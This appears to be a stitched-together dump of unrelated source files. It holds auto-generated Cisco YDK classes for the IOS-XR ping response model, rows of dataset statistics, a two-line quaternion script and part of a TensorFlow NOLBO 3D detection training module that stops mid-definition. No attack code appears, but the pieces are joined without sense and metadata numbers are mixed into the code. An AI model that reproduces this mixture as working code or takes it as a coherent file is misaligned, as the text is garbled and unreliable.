        self._child_container_classes = OrderedDict([("ping-response", ("ping_response", Ping.Output.PingResponse))])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict()

        # Child container is instantiated eagerly and registered by YANG name.
        self.ping_response = Ping.Output.PingResponse()
        self.ping_response.parent = self
        self._children_name_map["ping_response"] = "ping-response"
        self._children_yang_names.add("ping-response")
        self._segment_path = lambda: "output"
        self._absolute_path = lambda: "Cisco-IOS-XR-ping-act:ping/%s" % self._segment_path()
class PingResponse(Entity):
    """
    .. attribute:: ipv4

        **type**\: list of :py:class:`Ipv4 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Output.PingResponse.Ipv4>`

    .. attribute:: ipv6

        **type**\: :py:class:`Ipv6 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Output.PingResponse.Ipv6>`
    """

    _prefix = 'ping-act'
    _revision = '2016-09-28'

    def __init__(self):
        # Response container: ipv6 is a single child container, ipv4 is a
        # keyed YANG list (one entry per destination).
        super(Ping.Output.PingResponse, self).__init__()

        self.yang_name = "ping-response"
        self.yang_parent_name = "output"
        self.is_top_level_class = False
        self.has_list_ancestor = False
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([("ipv6", ("ipv6", Ping.Output.PingResponse.Ipv6))])
        self._child_list_classes = OrderedDict([("ipv4", ("ipv4", Ping.Output.PingResponse.Ipv4))])
        self._leafs = OrderedDict()

        self.ipv6 = Ping.Output.PingResponse.Ipv6()
        self.ipv6.parent = self
        self._children_name_map["ipv6"] = "ipv6"
        self._children_yang_names.add("ipv6")

        self.ipv4 = YList(self)
        self._segment_path = lambda: "ping-response"
        self._absolute_path = lambda: "Cisco-IOS-XR-ping-act:ping/output/%s" % self._segment_path()

    def __setattr__(self, name, value):
        # No leaf attributes here; validation list is empty.
        self._perform_setattr(Ping.Output.PingResponse, [], name, value)
class Ipv4(Entity):
    """
    .. attribute:: destination  (key)

        Ping destination address or hostname
        **type**\: str
        **mandatory**\: True

    .. attribute:: repeat_count

        Number of ping packets to be sent out
        **type**\: int
        **range:** 1..64
        **default value**\: 5

    .. attribute:: data_size

        Size of ping packet
        **type**\: int
        **range:** 36..18024
        **default value**\: 100

    .. attribute:: timeout

        Timeout in seconds
        **type**\: int
        **range:** 0..36
        **default value**\: 2

    .. attribute:: interval

        Ping interval in milli seconds
        **type**\: int
        **range:** 0..3600
        **default value**\: 10

    .. attribute:: pattern

        Pattern of payload data
        **type**\: str
        **pattern:** [0\-9a\-fA\-F]{1,8}

    .. attribute:: sweep

        Sweep is enabled
        **type**\: bool

    .. attribute:: replies

        **type**\: :py:class:`Replies <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Output.PingResponse.Ipv4.Replies>`

    .. attribute:: hits

        Number of packets reach to destination and get reply back
        **type**\: int
        **range:** 0..18446744073709551615

    .. attribute:: total

        Total number of packets sent out
        **type**\: int
        **range:** 0..18446744073709551615

    .. attribute:: success_rate

        Successful rate of ping
        **type**\: int
        **range:** 0..18446744073709551615

    .. attribute:: rtt_min

        Minimum value of Round Trip Time
        **type**\: int
        **range:** 0..18446744073709551615

    .. attribute:: rtt_avg

        Average value of Round Trip Time
        **type**\: int
        **range:** 0..18446744073709551615

    .. attribute:: rtt_max

        Maximum value of Round Trip Time
        **type**\: int
        **range:** 0..18446744073709551615

    .. attribute:: sweep_min

        Minimum value of sweep size
        **type**\: int
        **range:** 0..4294967295

    .. attribute:: sweep_max

        Maximum value of sweep size
        **type**\: int
        **range:** 0..18446744073709551615

    .. attribute:: rotate_pattern

        Rotate Pattern is enabled
        **type**\: bool

    .. attribute:: ping_error_response

        Error response for each ping, in case of bulk ping
        **type**\: str
    """

    _prefix = 'ping-act'
    _revision = '2016-09-28'

    def __init__(self):
        # Per-destination ipv4 response list entry; keyed by 'destination'.
        super(Ping.Output.PingResponse.Ipv4, self).__init__()

        self.yang_name = "ipv4"
        self.yang_parent_name = "ping-response"
        self.is_top_level_class = False
        self.has_list_ancestor = False
        self.ylist_key_names = ['destination']
        self._child_container_classes = OrderedDict([("replies", ("replies", Ping.Output.PingResponse.Ipv4.Replies))])
        self._child_list_classes = OrderedDict([])
        # Order mirrors the YANG model.
        self._leafs = OrderedDict([
            ('destination', YLeaf(YType.str, 'destination')),
            ('repeat_count', YLeaf(YType.uint64, 'repeat-count')),
            ('data_size', YLeaf(YType.uint64, 'data-size')),
            ('timeout', YLeaf(YType.uint64, 'timeout')),
            ('interval', YLeaf(YType.uint32, 'interval')),
            ('pattern', YLeaf(YType.str, 'pattern')),
            ('sweep', YLeaf(YType.boolean, 'sweep')),
            ('hits', YLeaf(YType.uint64, 'hits')),
            ('total', YLeaf(YType.uint64, 'total')),
            ('success_rate', YLeaf(YType.uint64, 'success-rate')),
            ('rtt_min', YLeaf(YType.uint64, 'rtt-min')),
            ('rtt_avg', YLeaf(YType.uint64, 'rtt-avg')),
            ('rtt_max', YLeaf(YType.uint64, 'rtt-max')),
            ('sweep_min', YLeaf(YType.uint32, 'sweep-min')),
            ('sweep_max', YLeaf(YType.uint64, 'sweep-max')),
            ('rotate_pattern', YLeaf(YType.boolean, 'rotate-pattern')),
            ('ping_error_response', YLeaf(YType.str, 'ping-error-response')),
        ])
        self.destination = None
        self.repeat_count = None
        self.data_size = None
        self.timeout = None
        self.interval = None
        self.pattern = None
        self.sweep = None
        self.hits = None
        self.total = None
        self.success_rate = None
        self.rtt_min = None
        self.rtt_avg = None
        self.rtt_max = None
        self.sweep_min = None
        self.sweep_max = None
        self.rotate_pattern = None
        self.ping_error_response = None

        self.replies = Ping.Output.PingResponse.Ipv4.Replies()
        self.replies.parent = self
        self._children_name_map["replies"] = "replies"
        self._children_yang_names.add("replies")
        # List entries are addressed by their key predicate in the path.
        self._segment_path = lambda: "ipv4" + "[destination='" + str(self.destination) + "']"
        self._absolute_path = lambda: "Cisco-IOS-XR-ping-act:ping/output/ping-response/%s" % self._segment_path()

    def __setattr__(self, name, value):
        # Route attribute writes through YDK validation for the declared leaf names.
        self._perform_setattr(Ping.Output.PingResponse.Ipv4, ['destination', 'repeat_count', 'data_size', 'timeout', 'interval', 'pattern', 'sweep', 'hits', 'total', 'success_rate', 'rtt_min', 'rtt_avg', 'rtt_max', 'sweep_min', 'sweep_max', 'rotate_pattern', 'ping_error_response'], name, value)
class Replies(Entity):
    """
    .. attribute:: reply

        **type**\: list of :py:class:`Reply <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Output.PingResponse.Ipv4.Replies.Reply>`
    """

    _prefix = 'ping-act'
    _revision = '2016-09-28'

    def __init__(self):
        # Container holding the keyed list of per-packet replies.
        super(Ping.Output.PingResponse.Ipv4.Replies, self).__init__()

        self.yang_name = "replies"
        self.yang_parent_name = "ipv4"
        self.is_top_level_class = False
        # True: the enclosing ipv4 node is a YANG list, so no static
        # absolute path can be generated for this container.
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([("reply", ("reply", Ping.Output.PingResponse.Ipv4.Replies.Reply))])
        self._leafs = OrderedDict()

        self.reply = YList(self)
        self._segment_path = lambda: "replies"

    def __setattr__(self, name, value):
        # No leaf attributes here; validation list is empty.
        self._perform_setattr(Ping.Output.PingResponse.Ipv4.Replies, [], name, value)
class Reply(Entity):
    """
    .. attribute:: reply_index  (key)

        Index of the reply list
        **type**\: int
        **range:** 1..2147483647

    .. attribute:: result

        Response for each packet
        **type**\: str

    .. attribute:: broadcast_reply_addresses

        **type**\: :py:class:`BroadcastReplyAddresses <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Output.PingResponse.Ipv4.Replies.Reply.BroadcastReplyAddresses>`
    """

    _prefix = 'ping-act'
    _revision = '2016-09-28'

    def __init__(self):
        # One reply per transmitted ping packet; keyed by 'reply_index'.
        super(Ping.Output.PingResponse.Ipv4.Replies.Reply, self).__init__()

        self.yang_name = "reply"
        self.yang_parent_name = "replies"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['reply_index']
        self._child_container_classes = OrderedDict([("broadcast-reply-addresses", ("broadcast_reply_addresses", Ping.Output.PingResponse.Ipv4.Replies.Reply.BroadcastReplyAddresses))])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('reply_index', YLeaf(YType.uint64, 'reply-index')),
            ('result', YLeaf(YType.str, 'result')),
        ])
        self.reply_index = None
        self.result = None

        self.broadcast_reply_addresses = Ping.Output.PingResponse.Ipv4.Replies.Reply.BroadcastReplyAddresses()
        self.broadcast_reply_addresses.parent = self
        self._children_name_map["broadcast_reply_addresses"] = "broadcast-reply-addresses"
        self._children_yang_names.add("broadcast-reply-addresses")
        self._segment_path = lambda: "reply" + "[reply-index='" + str(self.reply_index) + "']"

    def __setattr__(self, name, value):
        # Route attribute writes through YDK validation for the declared leaf names.
        self._perform_setattr(Ping.Output.PingResponse.Ipv4.Replies.Reply, ['reply_index', 'result'], name, value)
class BroadcastReplyAddresses(Entity):
    """
    .. attribute:: broadcast_reply_address

        **type**\: list of :py:class:`BroadcastReplyAddress <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Output.PingResponse.Ipv4.Replies.Reply.BroadcastReplyAddresses.BroadcastReplyAddress>`
    """

    _prefix = 'ping-act'
    _revision = '2016-09-28'

    def __init__(self):
        # Container for the list of addresses answering a broadcast ping.
        super(Ping.Output.PingResponse.Ipv4.Replies.Reply.BroadcastReplyAddresses, self).__init__()

        self.yang_name = "broadcast-reply-addresses"
        self.yang_parent_name = "reply"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([("broadcast-reply-address", ("broadcast_reply_address", Ping.Output.PingResponse.Ipv4.Replies.Reply.BroadcastReplyAddresses.BroadcastReplyAddress))])
        self._leafs = OrderedDict()

        self.broadcast_reply_address = YList(self)
        self._segment_path = lambda: "broadcast-reply-addresses"

    def __setattr__(self, name, value):
        # No leaf attributes here; validation list is empty.
        self._perform_setattr(Ping.Output.PingResponse.Ipv4.Replies.Reply.BroadcastReplyAddresses, [], name, value)
class BroadcastReplyAddress(Entity):
    """
    .. attribute:: reply_address  (key)

        Broadcast reply address
        **type**\: str

    .. attribute:: result

        Sign for each reply packet
        **type**\: str
    """

    _prefix = 'ping-act'
    _revision = '2016-09-28'

    def __init__(self):
        # One entry per responding address; keyed by 'reply_address'.
        super(Ping.Output.PingResponse.Ipv4.Replies.Reply.BroadcastReplyAddresses.BroadcastReplyAddress, self).__init__()

        self.yang_name = "broadcast-reply-address"
        self.yang_parent_name = "broadcast-reply-addresses"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['reply_address']
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('reply_address', YLeaf(YType.str, 'reply-address')),
            ('result', YLeaf(YType.str, 'result')),
        ])
        self.reply_address = None
        self.result = None
        self._segment_path = lambda: "broadcast-reply-address" + "[reply-address='" + str(self.reply_address) + "']"

    def __setattr__(self, name, value):
        # Route attribute writes through YDK validation for the declared leaf names.
        self._perform_setattr(Ping.Output.PingResponse.Ipv4.Replies.Reply.BroadcastReplyAddresses.BroadcastReplyAddress, ['reply_address', 'result'], name, value)
class Ipv6(Entity):
    """
    .. attribute:: destination

        Ping destination address or hostname
        **type**\: str
        **mandatory**\: True

    .. attribute:: repeat_count

        Number of ping packets to be sent out
        **type**\: int
        **range:** 1..64
        **default value**\: 5

    .. attribute:: data_size

        Size of ping packet
        **type**\: int
        **range:** 36..18024
        **default value**\: 100

    .. attribute:: timeout

        Timeout in seconds
        **type**\: int
        **range:** 0..36
        **default value**\: 2

    .. attribute:: interval

        Ping interval in milli seconds
        **type**\: int
        **range:** 0..3600
        **default value**\: 10

    .. attribute:: pattern

        Pattern of payload data
        **type**\: str
        **pattern:** [0\-9a\-fA\-F]{1,8}

    .. attribute:: sweep

        Sweep is enabled
        **type**\: bool

    .. attribute:: sweep_min

        Minimum value of sweep size
        **type**\: int
        **range:** 0..4294967295

    .. attribute:: sweep_max

        Maximum value of sweep size
        **type**\: int
        **range:** 0..18446744073709551615

    .. attribute:: rotate_pattern

        Rotate Pattern is enabled
        **type**\: bool

    .. attribute:: replies

        **type**\: :py:class:`Replies <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Output.PingResponse.Ipv6.Replies>`

    .. attribute:: hits

        Number of packets reach to destination and get reply back
        **type**\: int
        **range:** 0..18446744073709551615

    .. attribute:: total

        Total number of packets sent out
        **type**\: int
        **range:** 0..18446744073709551615

    .. attribute:: success_rate

        Successful rate of ping
        **type**\: int
        **range:** 0..18446744073709551615

    .. attribute:: rtt_min

        Minimum value of Round Trip Time
        **type**\: int
        **range:** 0..18446744073709551615

    .. attribute:: rtt_avg

        Average value of Round Trip Time
        **type**\: int
        **range:** 0..18446744073709551615

    .. attribute:: rtt_max

        Maximum value of Round Trip Time
        **type**\: int
        **range:** 0..18446744073709551615
    """

    _prefix = 'ping-act'
    _revision = '2016-09-28'

    def __init__(self):
        # ipv6 response container (single instance, unlike the keyed ipv4 list).
        super(Ping.Output.PingResponse.Ipv6, self).__init__()

        self.yang_name = "ipv6"
        self.yang_parent_name = "ping-response"
        self.is_top_level_class = False
        self.has_list_ancestor = False
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([("replies", ("replies", Ping.Output.PingResponse.Ipv6.Replies))])
        self._child_list_classes = OrderedDict([])
        # Order mirrors the YANG model.
        self._leafs = OrderedDict([
            ('destination', YLeaf(YType.str, 'destination')),
            ('repeat_count', YLeaf(YType.uint64, 'repeat-count')),
            ('data_size', YLeaf(YType.uint64, 'data-size')),
            ('timeout', YLeaf(YType.uint64, 'timeout')),
            ('interval', YLeaf(YType.uint32, 'interval')),
            ('pattern', YLeaf(YType.str, 'pattern')),
            ('sweep', YLeaf(YType.boolean, 'sweep')),
            ('sweep_min', YLeaf(YType.uint32, 'sweep-min')),
            ('sweep_max', YLeaf(YType.uint64, 'sweep-max')),
            ('rotate_pattern', YLeaf(YType.boolean, 'rotate-pattern')),
            ('hits', YLeaf(YType.uint64, 'hits')),
            ('total', YLeaf(YType.uint64, 'total')),
            ('success_rate', YLeaf(YType.uint64, 'success-rate')),
            ('rtt_min', YLeaf(YType.uint64, 'rtt-min')),
            ('rtt_avg', YLeaf(YType.uint64, 'rtt-avg')),
            ('rtt_max', YLeaf(YType.uint64, 'rtt-max')),
        ])
        self.destination = None
        self.repeat_count = None
        self.data_size = None
        self.timeout = None
        self.interval = None
        self.pattern = None
        self.sweep = None
        self.sweep_min = None
        self.sweep_max = None
        self.rotate_pattern = None
        self.hits = None
        self.total = None
        self.success_rate = None
        self.rtt_min = None
        self.rtt_avg = None
        self.rtt_max = None

        self.replies = Ping.Output.PingResponse.Ipv6.Replies()
        self.replies.parent = self
        self._children_name_map["replies"] = "replies"
        self._children_yang_names.add("replies")
        self._segment_path = lambda: "ipv6"
        self._absolute_path = lambda: "Cisco-IOS-XR-ping-act:ping/output/ping-response/%s" % self._segment_path()

    def __setattr__(self, name, value):
        # Route attribute writes through YDK validation for the declared leaf names.
        self._perform_setattr(Ping.Output.PingResponse.Ipv6, ['destination', 'repeat_count', 'data_size', 'timeout', 'interval', 'pattern', 'sweep', 'sweep_min', 'sweep_max', 'rotate_pattern', 'hits', 'total', 'success_rate', 'rtt_min', 'rtt_avg', 'rtt_max'], name, value)
class Replies(Entity):
    """
    .. attribute:: reply

        **type**\: list of :py:class:`Reply <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Output.PingResponse.Ipv6.Replies.Reply>`
    """

    _prefix = 'ping-act'
    _revision = '2016-09-28'

    def __init__(self):
        # Container holding the keyed list of per-packet ipv6 replies.
        super(Ping.Output.PingResponse.Ipv6.Replies, self).__init__()

        self.yang_name = "replies"
        self.yang_parent_name = "ipv6"
        self.is_top_level_class = False
        # False here (ipv6 is a container, not a list), so a static
        # absolute path is available — unlike the ipv4 Replies class.
        self.has_list_ancestor = False
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([("reply", ("reply", Ping.Output.PingResponse.Ipv6.Replies.Reply))])
        self._leafs = OrderedDict()

        self.reply = YList(self)
        self._segment_path = lambda: "replies"
        self._absolute_path = lambda: "Cisco-IOS-XR-ping-act:ping/output/ping-response/ipv6/%s" % self._segment_path()

    def __setattr__(self, name, value):
        # No leaf attributes here; validation list is empty.
        self._perform_setattr(Ping.Output.PingResponse.Ipv6.Replies, [], name, value)
class Reply(Entity):
    """
    .. attribute:: reply_index  (key)

        Index of the reply list
        **type**\: int
        **range:** 1..2147483647

    .. attribute:: result

        Response for each packet
        **type**\: str
    """

    _prefix = 'ping-act'
    _revision = '2016-09-28'

    def __init__(self):
        # One reply per transmitted ipv6 ping packet; keyed by 'reply_index'.
        super(Ping.Output.PingResponse.Ipv6.Replies.Reply, self).__init__()

        self.yang_name = "reply"
        self.yang_parent_name = "replies"
        self.is_top_level_class = False
        self.has_list_ancestor = False
        self.ylist_key_names = ['reply_index']
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('reply_index', YLeaf(YType.uint64, 'reply-index')),
            ('result', YLeaf(YType.str, 'result')),
        ])
        self.reply_index = None
        self.result = None
        self._segment_path = lambda: "reply" + "[reply-index='" + str(self.reply_index) + "']"
        self._absolute_path = lambda: "Cisco-IOS-XR-ping-act:ping/output/ping-response/ipv6/replies/%s" % self._segment_path()

    def __setattr__(self, name, value):
        # Route attribute writes through YDK validation for the declared leaf names.
        self._perform_setattr(Ping.Output.PingResponse.Ipv6.Replies.Reply, ['reply_index', 'result'], name, value)
def clone_ptr(self):
    # YDK hook: return a fresh top-level Ping entity and remember it.
    self._top_entity = Ping()
    return self._top_entity
| 37.792482
| 307
| 0.433974
| 3,903
| 48,261
| 5.134768
| 0.053036
| 0.031935
| 0.020957
| 0.01946
| 0.906791
| 0.884637
| 0.85839
| 0.846864
| 0.841076
| 0.827903
| 0
| 0.030498
| 0.461905
| 48,261
| 1,276
| 308
| 37.8221
| 0.74123
| 0.23288
| 0
| 0.764069
| 0
| 0.004329
| 0.133865
| 0.026674
| 0
| 0
| 0
| 0
| 0
| 1
| 0.062771
| false
| 0
| 0.010823
| 0
| 0.112554
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
824d517524ce89e71e9d2d9e5ffa092ab4aca89b
| 68
|
py
|
Python
|
car/quat.py
|
chocolatedisco/airsim-python
|
19616a3d5562a64eabc50b33e6dadf2105175c36
|
[
"MIT"
] | null | null | null |
car/quat.py
|
chocolatedisco/airsim-python
|
19616a3d5562a64eabc50b33e6dadf2105175c36
|
[
"MIT"
] | null | null | null |
car/quat.py
|
chocolatedisco/airsim-python
|
19616a3d5562a64eabc50b33e6dadf2105175c36
|
[
"MIT"
] | null | null | null |
# NOTE(review): script fragment — `Quaternion` is not imported or defined in
# this chunk; presumably these are two sample quaternions differing only in
# the sign of the last component. TODO: confirm against the full source.
q1 = Quaternion(0.7,2.2,-2.2,-0.7)
q2 = Quaternion(0.7,2.2,-2.2,0.7)
| 34
| 34
| 0.588235
| 20
| 68
| 2
| 0.3
| 0.3
| 0.3
| 0.65
| 0.9
| 0.9
| 0.9
| 0.9
| 0.9
| 0
| 0
| 0.285714
| 0.073529
| 68
| 2
| 35
| 34
| 0.349206
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
82c6830463da0ca9c8c6e1194d31817f310e7a36
| 90,208
|
py
|
Python
|
src/module/nolbo.py
|
bogus2000/Anchor-Distance
|
6c7db354f7bf8fee9f3b2910e05302c606cc4e9c
|
[
"MIT"
] | 1
|
2022-02-17T06:03:57.000Z
|
2022-02-17T06:03:57.000Z
|
src/module/nolbo.py
|
bogus2000/Anchor-Distance
|
6c7db354f7bf8fee9f3b2910e05302c606cc4e9c
|
[
"MIT"
] | null | null | null |
src/module/nolbo.py
|
bogus2000/Anchor-Distance
|
6c7db354f7bf8fee9f3b2910e05302c606cc4e9c
|
[
"MIT"
] | null | null | null |
import src.net_core.darknet as darknet
import src.net_core.autoencoder3D as ae3D
import src.net_core.priornet as priornet
import numpy as np
from src.module.function import *
from src.box_IoU_rotation.box_intersection_2d import *
# @tf.RegisterGradient("DynamicPartition")
# def _DynamicPartitionGrads(op, *grads):
# """Gradients for DynamicPartition."""
# data = op.inputs[0]
# indices = op.inputs[1]
# num_partitions = op.get_attr("num_partitions")
#
# prefix_shape = tf.shape(indices)
# original_indices = tf.reshape(tf.range(tf.reduce_prod(prefix_shape)), prefix_shape)
# partitioned_indices = tf.dynamic_partition(original_indices, indices, num_partitions)
# reconstructed = tf.dynamic_stitch(partitioned_indices, grads)
# reconstructed = tf.reshape(reconstructed, tf.shape(data))
# return [reconstructed, None]
# Example/default structure dict for building a `nolbo` model.
# NOTE(review): `nolbo.__init__` and `_encOutPartitioning` also read keys not
# present here ('category_num', 'bbox2DXY_dim', 'localXYZ_dim', 'latent_dim'),
# so callers presumably pass an extended/adjusted dict — verify before reuse.
config = {
    'encoder_backbone':{
        'name' : 'nolbo_backbone',
        'predictor_num':9,
        'bbox2D_xy_dim':2, 'bbox3D_dim':3, 'orientation_dim':1,
        'localZ_dim':1,
        'inst_dim':10, 'z_inst_dim':16,
        'activation' : 'elu',
    },
    'encoder_head':{
        'name' : 'nolbo_head',
        # Per-predictor channel budget; grouping presumably matches the
        # slicing in `_encOutPartitioning` — TODO confirm.
        'output_dim' : 5*(1+4+3+(2*3+3)+2*16),
        'filter_num_list':[1024,1024,1024],
        'filter_size_list':[3,3,3],
        'activation':'elu',
    },
    'decoder':{
        # NOTE(review): 'docoder' looks like a typo for 'decoder', but this is
        # a runtime identifier (used as the weight file name in
        # saveDecoder/loadDecoder) — left unchanged to keep checkpoints loadable.
        'name':'docoder',
        'input_dim' : 16,
        'output_shape':[64,64,64,1],
        'filter_num_list':[512,256,128,64,1],
        'filter_size_list':[4,4,4,4,4],
        'strides_list':[1,2,2,2,2],
        'activation':'elu',
        'final_activation':'sigmoid'
    },
    'prior' : {
        'name' : 'priornet',
        'input_dim' : 10,  # class num (one-hot vector)
        'unit_num_list' : [64, 32, 16],
        'core_activation' : 'elu',
        'const_log_var' : 0.0,
    }
}
class nolbo(object):
def __init__(self, nolbo_structure,
             learning_rate=1e-4,
             IoU2D_loss=True, IoU3D_loss=True,
             solver='adam'):
    """Build the NOLBO model and its optimizer.

    Args:
        nolbo_structure: dict with keys 'category_num', 'encoder_backbone',
            'encoder_head', 'decoder' and 'prior' describing each sub-network.
        learning_rate: optimizer learning rate.
        IoU2D_loss, IoU3D_loss: whether the 2D CIoU / 3D IoU loss terms are
            added to the total loss in `fit`.
        solver: 'adam' or 'sgd' (case-insensitive).

    Raises:
        ValueError: if `solver` names an unsupported optimizer.  (Previously an
            unknown solver silently left `self._optimizer` unset, deferring the
            failure to the first `fit` call.)
    """
    self._category_num = nolbo_structure['category_num']
    self._enc_backbone_str = nolbo_structure['encoder_backbone']
    self._enc_head_str = nolbo_structure['encoder_head']
    self._dec_str = nolbo_structure['decoder']
    self._prior_str = nolbo_structure['prior']
    # Orientation variance prior: (15 degrees expressed in radians) squared.
    self._rad_var = (15.0/180.0 * 3.141593) ** 2
    self._IoU2D_loss, self._IoU3D_loss = IoU2D_loss, IoU3D_loss
    self._buildModel()
    # Case-insensitive match keeps the old exact spellings ('adam'/'Adam',
    # 'sgd'/'SGD') working while accepting any capitalization.
    solver_name = solver.lower()
    if solver_name == 'adam':
        self._optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)
    elif solver_name == 'sgd':
        self._optimizer = tf.keras.optimizers.SGD(learning_rate=learning_rate, momentum=0.9, decay=0.0005)
    else:
        raise ValueError("unsupported solver {!r}; expected 'adam' or 'sgd'".format(solver))
def _buildModel(self):
    """Instantiate every sub-network: Darknet19 backbone plus its 2D head,
    the detection head, the 3D shape decoder, the car prior network and the
    category classifier."""
    print('build Models...')
    self._encoder_core = darknet.Darknet19(name=self._enc_backbone_str['name'], activation='lrelu')
    self._encoder_core_head = darknet.Darknet19_head2D(name=self._enc_backbone_str['name'] + '_head',
                                                       activation='lrelu')
    # ==============set encoder head
    self._encoder_head = darknet.head2D(name=self._enc_head_str['name'],
                                        input_shape=[None, None, 1024],
                                        output_dim=self._enc_head_str['output_dim'],
                                        last_pooling=None, activation=self._enc_head_str['activation'])
    # #==============set decoder3D
    self._decoder = ae3D.decoder3D(structure=self._dec_str)
    self._priornet_car = priornet.priornet(structure=self._prior_str)
    # Classifier maps the 64-d latent to category logits/scores.
    self._classifier = darknet.classifier(name=None, input_shape=[64,], output_dim=self._category_num, activation='relu')
    print('done')
def fit(self, inputs):
    """Run one training step on a batch.

    Unpacks `inputs` (see `_getInputs`), runs the encoder/decoder/priornet
    forward passes under a GradientTape, forms the weighted total loss,
    applies one optimizer update, and returns a tuple of scalar losses and
    evaluation metrics (objness/no-objness probabilities, voxel precision
    and recall).
    """
    self._getInputs(inputs=inputs)
    with tf.GradientTape() as tape:
        # get encoder output and loss
        self._enc_output = self._encoder_head(
            self._encoder_core_head(
                self._encoder_core(self._input_images, training=True)
                , training=True)
            , training=True)
        self._calcEncoderOutput()
        self._category_pred = self._classifier(self._z, training=True)
        self._getEncoderLoss()
        # # get (priornet, decoder) output and loss
        self._inst_mean_prior, self._inst_log_var_prior = self._priornet_car(self._carInstList, training=True)
        self._outputs = self._decoder(self._z_car, training=True)
        self._getDecoderAndPriorLoss()
        # get network parameter regulization loss
        # reg_loss = tf.reduce_sum(self._encoder_head.losses + self._encoder_backbone.losses + self._decoder.losses + self._priornet.losses)
        # reg_loss = tf.reduce_sum(self._encoder_backbone.losses + self._encoder_head.losses)

        # Reduce each per-sample loss over the batch axis.
        self._loss_objness = tf.reduce_mean(self._loss_objness, axis=0)
        # print(self._loss_objness.shape)
        self._loss_no_objness = tf.reduce_mean(self._loss_no_objness, axis=0)
        self._loss_bbox2D_hw = tf.reduce_mean(self._loss_bbox2D_hw, axis=0)
        self._loss_bbox2D_xy = tf.reduce_mean(self._loss_bbox2D_xy, axis=0)
        self._loss_bbox2D_CIOU = tf.reduce_mean(self._loss_bbox2D_CIOU, axis=0)
        self._loss_bbox3D = tf.reduce_mean(self._loss_bbox3D, axis=0)
        self._loss_bbox3D_IoU = tf.reduce_mean(self._loss_bbox3D_IoU, axis=0)
        self._loss_localXYZ = tf.reduce_mean(self._loss_localXYZ, axis=0)
        self._loss_shape = tf.reduce_mean(self._loss_shape, axis=0)
        self._loss_latents_kl = tf.reduce_mean(self._loss_latents_kl, axis=0)
        self._loss_prior_reg = tf.reduce_mean(self._loss_prior_reg, axis=0)
        self._loss_sincos = tf.reduce_mean(self._loss_sincos, axis=0)
        self._loss_sincos1 = tf.reduce_mean(self._loss_sincos1, axis=0)
        # self._loss_sincos_kl = tf.reduce_mean(self._loss_sincos_kl, axis=0)
        self._loss_category = tf.reduce_mean(self._loss_category, axis=0)

        # total loss (hand-tuned per-term weights)
        total_loss = (
                30.0 * self._loss_objness + 0.05 * self._loss_no_objness
                + 20.0 * self._loss_bbox3D + 20.0 * self._loss_bbox2D_xy
                # + 20.0 * self._loss_bbox3D_IoU + 20.0 * self._loss_bbox2D_CIOU
                + 100.0 * self._loss_localXYZ
                + self._loss_shape
                + self._loss_latents_kl
                + 0.01 * self._loss_prior_reg
                + 100.0 * self._loss_sincos + 1000. * self._loss_sincos1
                # + 0.01 * self._loss_sincos_kl
                + 100.0 * self._loss_category
                # + reg_loss
        )
        # Optional IoU-based terms, toggled at construction time.
        if self._IoU2D_loss:
            total_loss += 20.0 * (self._loss_bbox2D_CIOU + 0.1 * self._loss_bbox2D_hw)
        if self._IoU3D_loss:
            total_loss += self._loss_bbox3D_IoU

    trainable_variables = self._encoder_core.trainable_variables + self._encoder_core_head.trainable_variables + self._encoder_head.trainable_variables\
                          + self._decoder.trainable_variables + self._priornet_car.trainable_variables + self._classifier.trainable_variables
    grads = tape.gradient(total_loss, trainable_variables)
    self._optimizer.apply_gradients(zip(grads, trainable_variables))

    # ==== evaluations
    self._objnessEval()
    self._obj_prb = tf.reduce_mean(self._obj_prb)
    self._no_obj_prb = tf.reduce_mean(self._no_obj_prb)
    TP, FP, FN = voxelPrecisionRecall(xTarget=self._output_images_gt, xPred=self._outputs)
    pr = tf.reduce_mean(TP / (TP + FP + 1e-10))
    rc = tf.reduce_mean(TP / (TP + FN + 1e-10))
    return self._loss_objness, self._loss_no_objness,\
           self._loss_bbox2D_CIOU, self._loss_bbox3D_IoU, \
           self._loss_bbox3D, self._loss_localXYZ, \
           self._loss_sincos, self._loss_sincos1,\
           self._loss_category, self._loss_shape, \
           self._obj_prb, self._no_obj_prb, \
           pr, rc
def saveEncoderBackbone(self, save_path):
